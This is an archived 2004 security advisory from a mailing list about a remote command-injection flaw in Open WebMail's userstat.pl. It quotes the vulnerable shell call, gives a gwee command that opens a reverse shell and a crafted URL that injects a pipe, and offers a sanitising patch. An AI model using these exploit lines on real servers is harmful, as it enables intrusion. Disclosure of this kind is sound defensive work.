[UNIX] Open Webmail Remote Command Execution (userstat.pl)
From: SecuriTeam (support_at_securiteam.com)
Date: 05/11/04
- Previous message: SecuriTeam: "[TOOL] Gwee (Generic Web Exploitation Engine)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 11 May 2004 16:08:22 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Open Webmail Remote Command Execution (userstat.pl)
------------------------------------------------------------------------
SUMMARY
" <http://openwebmail.org> Open WebMail is a webmail system based on the
Neomail version 1.14 from Ernie Miller. Open WebMail is designed to manage
very large mail folder files in a memory efficient way. It also provides a
range of features to help users migrate smoothly from Microsoft Outlook to
Open WebMail". A remote attacker can run arbitrary commands with the web
server's privileges by exploiting an unfiltered parameter in userstat.pl.
DETAILS
Vulnerable Systems:
* Open Webmail versions 2.20, 2.21 and 2.30
* Limited exploitation on openwebmail-current.tgz that was released on
2004-04-30 (See below)
The vulnerability was discovered in an obsolete script named userstat.pl
shipped with Open Webmail. The script doesn't properly filter out shell
characters from the loginname parameter. The loginname parameter is used
as an argument when executing openwebmail-tool.pl from the vulnerable
script. By adding a ";", "|" or "( )" followed by the shell command to a
http GET, HEAD or POST request an attacker can execute arbitrary system
commands as an unprivileged user (the Apache user, "nobody" or "www",
e.g.).
Vulnerable Code:
From userstat.pl (about line 52):
my $user = cookie('openwebmail-loginname') || param('loginname') || '';
my $playsound = param('playsound')||'';
my $html=qq|<a href="_URL_" target="_blank" style="text-decoration:
none">|.
qq|<font color="_COLOR_">_TEXT_</font></a>|;
if ($user ne "") {
my $status=`$ow_cgidir/openwebmail-tool.pl -m -e $user`; # <-- $user is
used in the system call
if ($status =~ /has no mail/) {
Exploit:
At least 2 exploits are in circulation, one by Nullbyte and one a rewrite
by Shadowinteger. Exploitation of openwebmail-current.tgz (2004-04-30
5.8MB) is limited (see 'Vendor Status' below). You can use Gwee (generic
web exploitation engine) available from <http://cycom.se/dl/gwee>
http://cycom.se/dl/gwee to exploit using the following command:
$ gwee -L -y'loginname=%3B' -llocalhost -p31337
http://target/cgi-bin/openwebmail/userstat.pl
-L Use built-in TCP listener (like "nc -l").
-l The host or IP address to have the reverse shell code connect back
to.
-p The port to have the reverse shell code connect back to.
Vendor Status:
Cycom AB has provided a diff patch that fixes the issue. Ken Girrard wrote
and published an advisory long before this one. He provided a patch with
his advisory that results in userstat.pl still being vulnerable to remote
arbitrary command execution, this patch is applied to (shipped with)
openwebmail-current.tgz released 2004-04-30 (5.8MB).
Girrard's patch doesn't filter out "|" (pipes) and "/", but does filter
out spaces and tabs, which makes it impossible to pass arguments to
commands an attacker would want to execute.
Nevertheless, it's still possible to execute commands without arguments.
An example of such an attack would be an attacker that has write access to
the box using e.g. FTP and uploads a reverse shell code, marks it
executable and enters the absolute path to it in a crafted URL like this
one for example:
http://target/cgi-bin/openwebmail/userstat.pl?loginname=%7C/home/fu/bar
Unofficial Patch:
- --- userstat.pl.orig 2004-02-20 14:58:06.000000000 +0100
+++ userstat.pl 2004-02-21 18:05:16.000000000 +0100
@@ -52,6 +52,9 @@
my $html=qq|<a href="_URL_" target="_blank" style="text-decoration:
none">|.
qq|<font color="_COLOR_">_TEXT_</font></a>|;
+# filter out dangerous characters
+$user =~ s/[\/\"\'\`\|\<\>\\\(\)\[\]\{\}\$\s;&]//g;
+
if ($user ne "") {
my $status=`$ow_cgidir/openwebmail-tool.pl -m -e $user`;
if ($status =~ /has no mail/) {
cd cgi-bin/openwebmail/ and run: $ patch -i owm.patch
ADDITIONAL INFORMATION
The information has been provided by <mailto:michel@cycom.se> Michel
Blomgren.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[TOOL] Gwee (Generic Web Exploitation Engine)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
